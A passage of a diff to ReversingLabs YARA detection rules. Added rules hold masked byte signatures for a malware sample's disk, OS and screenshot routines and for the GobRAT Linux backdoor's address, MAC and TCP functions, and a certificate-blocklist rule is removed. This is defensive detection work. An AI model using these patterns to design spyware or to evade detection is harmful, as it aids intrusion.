+            ?? ?? E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 63 48 ?? 8B 84 0C ?? ?? ?? ?? 0F BA
+            F0 ?? 0F BA E8 ?? 89 84 0C ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 48 63 51 ?? 48 8D 8C 24 ?? ?? ?? ?? 48 03 CA 48 8B
+            50 ?? FF 10 0F 28 CE 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48
+            8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 63 48 ?? 8B 84 0C ??
+            ?? ?? ?? 0F BA F0 ?? 0F BA E8 ?? 89 84 0C ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8D 8C 24 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 48 63 51 ?? 48 8D 8C 24 ?? ?? ?? ??
+            48 03 CA 48 8B 50 ?? FF 10 0F 28 CF 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 15
+            ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 0F 57 C0 0F 11 44 24 ?? 4D 8B
+            CD 4C 89 6C 24 ?? 41 BA ?? ?? ?? ?? 4C 89 94 24 ?? ?? ?? ?? C6 44 24 ?? ?? 41 0F BA
+        }
+		$get_disk_information_p6 = {
+            EC ?? 44 89 64 24 ?? 33 C0 0F 11 84 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 8B 8C 24
+            ?? ?? ?? ?? 8B C1 24 ?? 3C ?? 74 ?? 48 8B 84 24 ?? ?? ?? ?? 4C 8B 00 4D 85 C0 74 ??
+            48 8B 84 24 ?? ?? ?? ?? 48 8B 10 4C 3B 84 24 ?? ?? ?? ?? 4C 0F 42 84 24 ?? ?? ?? ??
+            4C 2B C2 EB ?? F6 C1 ?? 75 ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 08 48 85 C9 74 ?? 48 8B
+            84 24 ?? ?? ?? ?? 48 8B 10 48 8B 84 24 ?? ?? ?? ?? 4C 63 00 4C 2B C2 4C 03 C1 EB ??
+            4C 8B 84 24 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 85 D2 74 ?? 48 8D 4C 24 ?? E8 ??
+            ?? ?? ?? 4C 8B 94 24 ?? ?? ?? ?? 4C 8B 4C 24 ?? 41 0F BA F4 ?? 41 83 CC ?? 44 89 64
+            24 ?? 48 8D 54 24 ?? 49 83 FA ?? 48 0F 47 54 24 ?? 4D 8B C1 48 8D 8C 24 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 90 48 8B 94 24 ?? ?? ?? ?? 48 83 FA ?? 76 ?? 48 FF C2 48 8B 4C 24 ??
+            48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48
+            83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            48 BF ?? ?? ?? ?? ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 83 FA ?? 76 ?? 48 FF C2 48
+            8B 8C 24 ?? ?? ?? ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48
+            2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ??
+            ?? 0F B6 44 24 ?? FE C0 8B B4 24
+        }
+		$get_os_information_p1 = {
+            48 89 5C 24 ?? 48 89 74 24 ?? 48 89 7C 24 ?? 55 48 8D AC 24 ?? ?? ?? ?? 48 81 EC ??
+            ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 85 ?? ?? ?? ?? 48 8B F9 48 89 4C 24 ??
+            33 F6 89 74 24 ?? 33 D2 41 B8 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D
+            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 0D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 85 C0 0F
+            84 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8B C8 FF 15 ?? ?? ?? ?? 48 8B D8 48 85 C0 0F
+            84 ?? ?? ?? ?? 33 D2 41 B8 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? C7 44 24 ?? ??
+            ?? ?? ?? 48 8D 4C 24 ?? FF D3 85 C0 0F 85 ?? ?? ?? ?? 8B 54 24 ?? 48 8D 8D ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 48 8B C8 48 8D 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 8B 54 24 ??
+            E8 ?? ?? ?? ?? 48 8B C8 48 8D 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 44 24 ?? 48 89 44
+            24 ?? 45 33 C9 45 33 C0 8B 54 24 ?? 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 8B 54 24 ?? 48 8D
+            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B C8 8B 54 24 ?? E8 ?? ??
+            ?? ?? 48 8B C8 48 8D 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 48 8D 54 24 ?? EB ?? 48
+        }
+		$get_os_information_p2 = {
+            8D 15 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 0F 57 C0 0F 11 07 48 89 77
+            ?? 48 C7 47 ?? ?? ?? ?? ?? 66 89 37 C7 44 24 ?? ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? 8B
+            C1 24 ?? 3C ?? 74 ?? 48 8B 85 ?? ?? ?? ?? 48 8B 10 48 85 D2 74 ?? 48 8B 85 ?? ?? ??
+            ?? 4C 8B 08 48 3B 95 ?? ?? ?? ?? 48 0F 42 95 ?? ?? ?? ?? 49 2B D1 EB ?? F6 C1 ?? 75
+            ?? 48 8B 85 ?? ?? ?? ?? 48 8B 08 48 85 C9 74 ?? 48 8B 85 ?? ?? ?? ?? 4C 8B 08 48 8B
+            85 ?? ?? ?? ?? 48 63 10 48 03 D2 49 2B D1 48 03 D1 49 8B C1 48 D1 FA 48 85 C0 74 ??
+            48 8B CF 48 83 FA ?? 77 ?? 48 89 57 ?? 48 8D 1C 12 4C 8B C3 49 8B D1 E8 ?? ?? ?? ??
+            66 89 34 3B EB ?? E8 ?? ?? ?? ?? 90 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C7 48
+            8B 8D ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 4C 8D 9C 24 ?? ?? ?? ?? 49 8B 5B ?? 49 8B
+            73 ?? 49 8B 7B ?? 49 8B E3 5D C3
+        }
+		$take_screenshot_p1 = {
+            48 89 5C 24 ?? 48 89 74 24 ?? 57 41 54 41 55 41 56 41 57 48 81 EC ?? ?? ?? ?? 48 8B
+            05 ?? ?? ?? ?? 48 33 C4 48 89 84 24 ?? ?? ?? ?? 8B FA 33 DB 48 8B 05 ?? ?? ?? ?? 48
+            89 84 24 ?? ?? ?? ?? 33 C9 FF 15 ?? ?? ?? ?? 4C 8B F8 48 89 84 24 ?? ?? ?? ?? 48 8B
+            C8 FF 15 ?? ?? ?? ?? 48 8B F0 48 89 44 24 ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 41 BC
+            ?? ?? ?? ?? 41 BD ?? ?? ?? ?? 4C 8D 84 24 ?? ?? ?? ?? BA ?? ?? ?? ?? 33 C9 FF 15 ??
+            ?? ?? ?? 85 C0 74 ?? 44 8B A4 24 ?? ?? ?? ?? 44 8B AC 24 ?? ?? ?? ?? 45 8B C5 41 8B
+            D4 49 8B CF FF 15 ?? ?? ?? ?? 48 8B D0 48 8B CE FF 15 ?? ?? ?? ?? 48 89 84 24 ?? ??
+            ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 5C 24 ?? 89 5C 24 ?? 4C 89 7C 24 ?? 44 89 6C 24 ??
+            45 8B CC 45 33 C0 33 D2 48 8B CE FF 15 ?? ?? ?? ?? 8B CF 41 0F AF CC B8 ?? ?? ?? ??
+            F7 E9 44 8B F2 41 D1 FE 41 8B CE C1 E9 ?? 44 03 F1 41 0F AF FD B8 ?? ?? ?? ?? F7 EF
+            8B F2 D1 FE 8B C6 C1 E8 ?? 03 F0 44 8B C6 41 8B D6 49 8B CF FF 15 ?? ?? ?? ?? 4C 8B
+            F8 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B F8 49 8B D7 48 8B C8 FF 15 ?? ??
+            ?? ?? C7 44 24 ?? ?? ?? ?? ?? 44 89 6C 24 ?? 44 89 64 24 ?? 89 5C 24 ?? 89 5C 24 ??
+            48 8B 44 24 ?? 48 89 44 24 ?? 89 74 24 ?? 45 8B CE 45 33 C0 33 D2 48 8B CF FF 15 ??
+            ?? ?? ?? 0F 57 C0 0F 11 84 24 ?? ?? ?? ?? 0F 11 84 24 ?? ?? ?? ?? 0F 11 84 24 ?? ??
+            ?? ?? 0F 11 84 24 ?? ?? ?? ?? 0F 11 84 24 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? 48 89 84
+            24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 89 9C 24 ??
+            ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B F8 48 8D 48 ?? FF 15 ?? ?? ??
+            ?? FF 47 ?? 48 8D 4F ?? FF 15 ?? ?? ?? ?? 90 4C 89 BC 24 ?? ?? ?? ?? 4C 8D 84 24 ??
+            ?? ?? ?? BA ?? ?? ?? ?? 49 8B CF FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? C6 84
+        }
+		$take_screenshot_p2 = {
+            24 ?? ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 89 8C 24 ?? ?? ?? ?? 44 8B 84 24 ?? ?? ?? ??
+            45 8B C8 41 F7 D9 45 0F 48 C8 44 89 8C 24 ?? ?? ?? ?? 0F B7 84 24 ?? ?? ?? ?? 89 84
+            24 ?? ?? ?? ?? 0F AF C1 83 C0 ?? 99 83 E2 ?? 03 C2 C1 F8 ?? C1 E0 ?? 89 84 24 ?? ??
+            ?? ?? 4C 8B 94 24 ?? ?? ?? ?? 4C 89 94 24 ?? ?? ?? ?? 45 85 C0 7E ?? 41 8D 49 ?? 0F
+            AF C8 48 63 D1 49 03 D2 48 89 94 24 ?? ?? ?? ?? F7 D8 89 84 24 ?? ?? ?? ?? EB ?? C6
+            84 24 ?? ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ??
+            89 84 24 ?? ?? ?? ?? 0F B7 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 9C 24 ?? ?? ??
+            ?? 48 89 9C 24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ??
+            48 89 9C 24 ?? ?? ?? ?? 4C 8D 84 24 ?? ?? ?? ?? BA ?? ?? ?? ?? 33 C9 FF 15 ?? ?? ??
+            ?? 48 8B 94 24 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 8C 24 ?? ??
+            ?? ?? 48 8B 01 45 33 C0 48 8D 94 24 ?? ?? ?? ?? FF 50 ?? 44 8B A4 24 ?? ?? ?? ?? 48
+            8B 8C 24 ?? ?? ?? ?? 48 8B 01 45 33 C9 45 33 C0 48 8B D3 FF 50 ?? 41 8B CC E8 ?? ??
+            ?? ?? 4C 8B E8 89 9C 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 48 8B 01 4C 8D 8C 24 ??
+            ?? ?? ?? 45 8B C4 49 8B D5 FF 50 ?? 4C 8D 8C 24 ?? ?? ?? ?? 45 8B C4 0F 1F 40 ?? 66
+            0F 1F 84 00 ?? ?? 00 00 49 FF C9 B8 ?? ?? ?? ?? 41 F7 E0 C1 EA ?? 0F B6 C2 C0 E0 ??
+            8D 0C 10 02 C9 44 2A C1 41 80 C0 ?? 45 88 01 44 8B C2 85 D2 75 ?? 4C 8D 84 24 ?? ??
+            ?? ?? 49 8B D1 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 90 4C 8B 44 24 ?? 48 8B 8C 24 ?? ?? ??
+            ?? 48 8B C1 49 2B C0 4C 8D 35 ?? ?? ?? ?? 48 83 F8 ?? 0F 82 ?? ?? ?? ?? 49 8D 40 ??
+            48 89 44 24 ?? 48 8D 7C 24 ?? 48 83 F9 ?? 48 0F 47 7C 24 ?? 48 8D 05 ?? ?? ?? ?? 48
+            3B C7 76 ?? 4A 8D 04 07 4C 3B F0 77 ?? BE ?? ?? ?? ?? 49 3B FE 77 ?? 4C 8B FB EB
+        }
+		$take_screenshot_p3 = {
+            4C 8B FF 4D 2B FE EB ?? BE ?? ?? ?? ?? 44 8B FE 48 8D 4F ?? 49 FF C0 48 8B D7 E8 ??
+            ?? ?? ?? 4D 8B C7 49 8B D6 48 8B CF E8 ?? ?? ?? ?? 4A 8D 0C 3F 49 2B F7 49 8D 56 ??
+            49 03 D7 4C 8B C6 E8 ?? ?? ?? ?? 48 8D 44 24 ?? EB ?? BE ?? ?? ?? ?? 48 89 74 24 ??
+            4C 89 74 24 ?? 8B D6 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 0F 57 C0 0F 11 84 24 ?? ?? ?? ??
+            48 89 9C 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 0F 10 00 0F 11 84 24 ?? ?? ?? ?? 0F
+            10 48 ?? 0F 11 8C 24 ?? ?? ?? ?? 48 89 58 ?? 48 C7 40 ?? ?? ?? ?? ?? C6 00 ?? 48 8B
+            94 24 ?? ?? ?? ?? 48 83 FA ?? 76 ?? 48 FF C2 48 8B 4C 24 ?? 48 8B C1 48 81 FA ?? ??
+            ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 48 89 5C 24 ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C6 44 24 ?? ??
+            48 8D 94 24 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C3 4C 8B 8C 24
+            ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 4C 8B 84 24 ?? ?? ?? ?? 4D 85 C9 0F 84 ?? ?? ??
+            ?? 66 66 66 0F 1F 84 00 ?? ?? 00 00 48 8D 8C 24 ?? ?? ?? ?? 48 83 FA ?? 49 0F 47 C8
+            0F BE 0C 01 81 F9 ?? ?? ?? ?? 73 ?? 48 8D 8C 24 ?? ?? ?? ?? 48 83 FA ?? 49 0F 47 C8
+            80 3C 01 ?? 74 ?? 48 8D 8C 24 ?? ?? ?? ?? 48 83 FA ?? 49 0F 47 C8 80 3C 01 ?? 74 ??
+            48 8D 8C 24 ?? ?? ?? ?? 48 83 FA ?? 49 0F 47 C8 48 8D 94 24 ?? ?? ?? ?? 48 83 BC 24
+            ?? ?? ?? ?? ?? 48 0F 47 94 24 ?? ?? ?? ?? 0F B6 0C 01 80 F1 ?? 88 0C 02 48 8B 94 24
+            ?? ?? ?? ?? 4C 8B 8C 24 ?? ?? ?? ?? 4C 8B 84 24 ?? ?? ?? ?? 48 FF C0 49 3B C1 0F 82
+            ?? ?? ?? ?? 48 83 FA ?? 76 ?? 48 FF C2 49 8B C0 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2
+            ?? 4D 8B 40 ?? 49 2B C0 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? ?? 49 8B C8 E8 ?? ??
+            ?? ?? 0F 10 84 24 ?? ?? ?? ?? 0F 11 84 24 ?? ?? ?? ?? 0F 10 8C 24 ?? ?? ?? ?? 0F 11
+        }
+		$take_screenshot_p4 = {
+            8C 24 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 66 49 0F 7E C1 66 0F 73 D9 ?? 66 48 0F 7E
+            C8 48 83 F8 ?? 49 0F 47 D1 45 33 C9 41 B8 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? FF 15
+            ?? ?? ?? ?? B9 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 45 33 C9 45 8B C4 49 8B D5 48 8B 8C 24
+            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ??
+            ?? 48 8B 01 FF 50 ?? 49 8B CD E8 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 8B 4C 24 ??
+            FF 15 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B 4C 24 ?? FF 15 ??
+            ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 33 C9 FF 15 ?? ?? ?? ?? 90 48 8B 94 24 ?? ?? ?? ??
+            48 83 FA ?? 76 ?? 48 FF C2 48 8B 8C 24 ?? ?? ?? ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 72
+            ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C6 84 24 ?? ??
+            ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 48 85 C9 74 ?? FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48
+            8B F8 48 8D 48 ?? FF 15 ?? ?? ?? ?? 83 6F ?? ?? 75 ?? 48 8D 4F ?? FF 15 ?? ?? ?? ??
+            48 8B 0F 48 85 C9 74 ?? FF 15 ?? ?? ?? ?? 48 89 1F 48 8D 4F ?? FF 15 ?? ?? ?? ?? 48
+            8D 4F ?? FF 15 ?? ?? ?? ?? 90 48 8B 8C 24 ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 4C 8D
+            9C 24 ?? ?? ?? ?? 49 8B 5B ?? 49 8B 73 ?? 49 8B E3 41 5F 41 5E 41 5D 41 5C 5F C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "yinsheng xie" and pe.signatures [ i ] . serial == "42:11:d2:e4:f0:e8:71:27:31:93:02:c5:5b:85:bc:f2" and 1360713599 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $get_disk_information_p* ) ) and ( all of ( $get_os_information_p* ) ) and ( all of ( $take_screenshot_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_07B44Cdbfffb78De05F4261672A67312 : INFO FILE
+rule REVERSINGLABS_Linux_Backdoor_Gobrat : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects GobRAT backdoor."
 		author = "ReversingLabs"
-		id = "18787692-1233-5ea8-869c-feb530d06237"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "390bd83e-ac43-511a-b07b-3dc3d9890353"
+		date = "2025-03-27"
+		modified = "2025-03-27"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L603-L619"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "c88a8543782fc49d8aa68f3fc8052bd3316d10118dfb2ef2eef5006de657b6f1"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/backdoor/Linux.Backdoor.GobRAT.yara#L1-L168"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "ce29568231a4103663f4b478de3210e00e14b14eda7781f05ecf0cf576fc5ad2"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Backdoor"
+		tc_detection_name = "GobRAT"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$get_local_address_p1 = {
+            49 3B 66 ?? 0F 86 ?? ?? ?? ?? 48 83 C4 ?? 48 89 6C 24 ?? 48 8D 6C 24 ?? 48 83 3D ??
+            ?? ?? ?? ?? 75 ?? E8 ?? ?? ?? ?? 48 85 FF 75 ?? 48 85 DB 74 ?? 48 89 5C 24 ?? 31 C9
+            EB ?? 48 8B 05 ?? ?? ?? ?? 48 8B 3D ?? ?? ?? ?? 48 8B 1D ?? ?? ?? ?? 48 8B 35 ?? ??
+            ?? ?? 48 8B 0D ?? ?? ?? ?? 4C 8B 05 ?? ?? ?? ?? 48 8B 6C 24 ?? 48 83 EC ?? C3 48 83
+            C0 ?? 48 89 D1 48 8B 50 ?? 4C 8D 0D ?? ?? ?? ?? 4C 39 08 74 ?? BA ?? ?? ?? ?? 48 89
+            4C 24 ?? 48 89 44 24 ?? 48 89 54 24 ?? 74 ?? 31 F6 EB ?? 48 8B 02 48 8B 5A ?? 48 8B
+            4A ?? E8 ?? ?? ?? ?? 84 C0 74 ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? 48 8B 54 24 ?? 48 8B
+            5C 24 ?? 4C 8D 0D ?? ?? ?? ?? 31 F6 EB ?? 48 8B 54 24 ?? 48 8B 02 48 8B 5A ?? 48 8B
+            4A ?? E8 ?? ?? ?? ?? 83 F0 ?? 48 8B 4C 24 ?? 48 8B 54 24 ?? 48 8B 5C 24 ?? 4C 8D 0D
+            ?? ?? ?? ?? 89 C6 48 8B 44 24 ?? 40 84 F6 74 ?? 4C 8B 12 4C 8B 5A ?? 4C 8B 62 ?? 49
+            83 FB ?? 75 ?? 4C 89 D6 EB ?? 49 83 FB ?? 75 ?? 31 F6 E9 ?? ?? ?? ?? 48 8D 51 ?? 48
+            39 D3 0F 8F ?? ?? ?? ?? 0F 1F 40 ?? E9 ?? ?? ?? ?? 31 F6 48 85 F6 74 ?? 4C 89 D0 4C
+            89 DB 4C 89 E1 E8 ?? ?? ?? ?? 48 8B 35 ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 48 8B 3D ??
+            ?? ?? ?? 4C 8D 46 ?? 4C 39 C7 73 ?? 48 89 44 24 ?? 48 89 5C 24 ?? 48 8D 05 ?? ?? ??
+            ?? 48 89 D3 48 89 F1 4C 89 C6 E8 ?? ?? ?? ?? 48 89 0D ?? ?? ?? ?? 83 3D ?? ?? ?? ??
+            ?? 75 ?? 48 89 05 ?? ?? ?? ?? EB ?? 48 8D 3D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C2 48
+        }
+		$get_local_address_p2 = {
+            89 DE 48 8B 44 24 ?? 48 8B 5C 24 ?? 4C 8D 46 ?? 4C 89 05 ?? ?? ?? ?? 48 C1 E6 ?? 48
+            89 5C 32 ?? 48 8D 3C 32 83 3D ?? ?? ?? ?? ?? 75 ?? 48 89 04 32 EB ?? E8 ?? ?? ?? ??
+            48 8B 54 24 ?? 48 8B 02 48 8B 5A ?? 48 8B 4A ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B
+            35 ?? ?? ?? ?? 48 8D 56 ?? 48 8B 1D ?? ?? ?? ?? 48 8B 3D ?? ?? ?? ?? 48 39 D7 73 ??
+            89 44 24 ?? 48 8D 05 ?? ?? ?? ?? 48 89 F1 48 89 D6 E8 ?? ?? ?? ?? 48 89 0D ?? ?? ??
+            ?? 83 3D ?? ?? ?? ?? ?? 75 ?? 48 89 05 ?? ?? ?? ?? EB ?? 48 8D 3D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 48 89 DE 48 89 C3 8B 44 24 ?? 48 8D 56 ?? 48 89 15 ?? ?? ?? ?? 89 04 B3 48
+            8B 44 24 ?? 48 8B 4C 24 ?? 48 8B 5C 24 ?? 4C 8D 0D ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 FF
+            C6 48 83 FE ?? 7D ?? 45 0F B6 2C 32 45 84 ED 74 ?? E9 ?? ?? ?? ?? 41 80 7A ?? ?? 0F
+            1F 44 00 ?? 0F 85 ?? ?? ?? ?? 41 80 7A ?? ?? 0F 85 ?? ?? ?? ?? 49 8D 72
+        }
+		$get_mac_address_p1 = {
+            4C 8D 64 24 ?? 4D 3B 66 ?? 0F 86 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 89 AC 24 ?? ??
+            ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 83 3D ?? ?? ?? ?? ?? 75 ?? E8 ?? ?? ?? ?? 48 85 FF
+            75 ?? 48 85 DB 74 ?? 48 89 5C 24 ?? 31 C9 EB ?? 31 C0 31 DB 48 8B AC 24 ?? ?? ?? ??
+            48 81 C4 ?? ?? ?? ?? C3 48 8B 05 ?? ?? ?? ?? 48 8B 1D ?? ?? ?? ?? 48 8B AC 24 ?? ??
+            ?? ?? 48 81 C4 ?? ?? ?? ?? C3 48 83 C0 ?? 48 89 D1 0F 10 00 0F 11 84 24 ?? ?? ?? ??
+            0F 10 40 ?? 0F 11 84 24 ?? ?? ?? ?? 0F 10 40 ?? 0F 11 84 24 ?? ?? ?? ?? 0F 10 40 ??
+            0F 11 84 24 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 8B B4 24 ?? ?? ?? ?? 48 85 D2 75
+            ?? 31 D2 31 F6 EB ?? 48 89 4C 24 ?? 48 89 84 24 ?? ?? ?? ?? 48 89 54 24 ?? 48 89 B4
+            24 ?? ?? ?? ?? 48 8D 0C 52 48 8D 49 ?? 48 89 4C 24 ?? 48 8D 05 ?? ?? ?? ?? 31 DB 0F
+            1F 44 00 ?? E8 ?? ?? ?? ?? 48 8B 54 24 ?? 48 8B B4 24 ?? ?? ?? ?? 48 8B 7C 24 ?? 31
+            C9 31 DB EB ?? 48 89 D9 48 89 C3 31 C0 E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 89 DA 48 89
+            C6 48 8B 84 24 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 85 D2 0F 85 ?? ?? ?? ?? 48 8D 51 ?? 48
+            39 D3 0F 8F ?? ?? ?? ?? E9 ?? ?? ?? ?? 46 88 0C 10 48 FF C1 4C 89 C3 48 39 D1 7D ??
+            48 89 4C 24 ?? 44 0F B6 04 0E 44 88 44 24 ?? 0F 1F 44 00 ?? 48 85 C9 7E ?? 4C 8D 4B
+            ?? 4C 39 CF 73 ?? 48 89 5C 24 ?? 48 89 D9 4C 89 CE 48 89 C3 48 8D 05 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 4C 8D 4B ?? 48 8B 54 24 ?? 48 8B 5C 24 ?? 48 8B B4 24 ?? ?? ?? ?? 44 0F
+        }
+		$get_mac_address_p2 = {
+            B6 44 24 ?? 48 89 CF 48 8B 4C 24 ?? C6 04 18 ?? EB ?? 49 89 D9 4D 8D 51 ?? 45 89 C3
+            41 C0 E8 ?? 45 0F B6 C0 4C 8D 25 ?? ?? ?? ?? 47 0F B6 04 04 4C 39 D7 73 ?? 44 88 44
+            24 ?? 4C 89 4C 24 ?? 48 89 C3 4C 89 C9 4C 89 D6 48 8D 05 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            4C 8D 53 ?? 48 8B 54 24 ?? 48 8B B4 24 ?? ?? ?? ?? 44 0F B6 44 24 ?? 4C 8B 4C 24 ??
+            44 0F B6 5C 24 ?? 4C 8D 25 ?? ?? ?? ?? 48 89 CF 48 8B 4C 24 ?? 46 88 04 08 4D 8D 42
+            ?? 41 83 E3 ?? 47 0F B6 0C 23 4C 39 C7 0F 83 ?? ?? ?? ?? 4C 89 54 24 ?? 44 88 4C 24
+            ?? 48 89 C3 4C 89 D1 4C 89 C6 48 8D 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 8D 43 ?? 48 8B
+            54 24 ?? 48 8B B4 24 ?? ?? ?? ?? 44 0F B6 4C 24 ?? 4C 8B 54 24 ?? 48 89 CF 48 8B 4C
+            24 ?? E9 ?? ?? ?? ?? 48 89 15 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 75 ?? 48 89 35 ?? ??
+            ?? ?? 66 90 E9 ?? ?? ?? ?? 48 8D 3D ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 0F 1F 44 00
+        }
+		$network_communication_tcp_p1 = {
